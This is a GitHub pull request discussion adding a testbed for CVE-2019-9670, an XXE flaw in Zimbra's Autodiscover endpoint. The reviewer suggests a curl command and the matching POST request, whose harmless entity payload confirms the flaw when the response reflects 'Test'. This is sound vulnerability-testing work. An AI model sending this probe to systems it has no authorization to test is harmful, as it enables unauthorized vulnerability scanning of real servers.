Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Testbed for CVE-2019-9670 - Synacor Zimbra XXE #113

Open
wants to merge 4 commits into
base: main
Choose a base branch
from
Open

Testbed for CVE-2019-9670 - Synacor Zimbra XXE #113

wants to merge 4 commits into from

Conversation

LeonardoE95
Copy link
Contributor

Hello there,

this PR contains the instructions required to setup a testbed for CVE-2019-9670.

@LeonardoE95 LeonardoE95 mentioned this pull request Dec 20, 2024
Open
giacomo-doyensec
giacomo-doyensec reviewed Feb 3, 2025
View reviewed changes
Copy link

@giacomo-doyensec giacomo-doyensec left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @LeonardoE95, thanks for your contribution!
The testbed is working, and the reproduction steps are clear. Please review the provided suggestions, and if they seem appropriate, feel free to apply them.

zimbra/CVE-2019-9670/README.md Outdated
Comment on lines 34 to 50
To test out the vulnerability, the following HTTP GET request can be used.

Request

```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 127.0.0.1
Content-Type: application/xml
Content-Length: 177

<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please provide a cURL command to easily reproduce the vulnerability without requiring an intercepting proxy

Suggested change
To test out the vulnerability, the following HTTP GET request can be used.
Request
```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 127.0.0.1
Content-Type: application/xml
Content-Length: 177
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```
## Reproduction Steps
To test out the vulnerability, the following curl command can be used:
```
curl -k -X $'POST'\
--data-binary $'<!DOCTYPE foo [<!ELEMENT foo ANY>\x0d\x0a<!ENTITY xxe \"Test\"> ]>\x0d\x0a<Request>\x0d\x0a<EMailAddress>email</EMailAddress>\x0d\x0a<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\x0d\x0a</Request>' \
$'https://{service-host}:{port}/Autodiscover/Autodiscover.xml'
```
which will generate a POST request similar to the one reported below:
```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Content-Type: application/xml
Content-Length: 177
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Useful feedback, thanks, added the curl command!

zimbra/CVE-2019-9670/README.md Outdated
Comment on lines 52 to 54
When sent to the vulnerable port (`8443`), the response will contain the string `Test`.

Vulnerable Response
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
When sent to the vulnerable port (`8443`), the response will contain the string `Test`.
Vulnerable Response
### Vulnerable Response
When sent to the vulnerable instance on port `8443`, the response will contain the string `Test`, as shown in the example below:

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Updated

zimbra/CVE-2019-9670/README.md Outdated
Comment on lines 75 to 77
When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.

Non Vulnerable Response
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.
Non Vulnerable Response
### Non Vulnerable Response
When sent to the non vulnerable instance on port `8500`, the response will not contain the string `Test`, as shown in the example below:

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Updated

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@giacomo-doyensec giacomo-doyensec giacomo-doyensec left review comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@LeonardoE95 @giacomo-doyensec @am0o0 @tooryx